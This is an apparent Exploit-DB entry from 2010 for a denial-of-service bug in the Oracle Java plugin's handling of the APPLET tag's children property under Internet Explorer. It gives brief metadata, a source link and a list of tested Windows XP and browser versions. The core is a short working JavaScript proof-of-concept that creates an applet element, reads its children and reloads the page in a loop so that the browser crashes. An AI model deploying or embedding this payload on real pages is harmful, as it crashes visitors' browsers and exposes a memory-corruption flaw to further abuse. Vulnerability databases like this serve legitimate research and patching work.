Oracle Java APPLET Tag Children Property Memory Corruption

2010-10-13T00:00:00
ID EDB-ID:15243
Type exploitdb
Reporter Skylined
Modified 2010-10-13T00:00:00

Description

Oracle Java APPLET Tag Children Property Memory Corruption. Dos exploit for windows platform

                                        
                                            Source: http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/

<SCRIPT>
  o=document.createElement("applet");
  setTimeout(function () {
    x=o.children;
    location.reload();
  }, 1);
</SCRIPT>

Tested with:
Windows XP sp3 (5.1.2600)
MSIE 7.0.5730.13
MSIE 8.0.6001.18702
Sun Java Version 6 Update 20 1.6.0_20-b02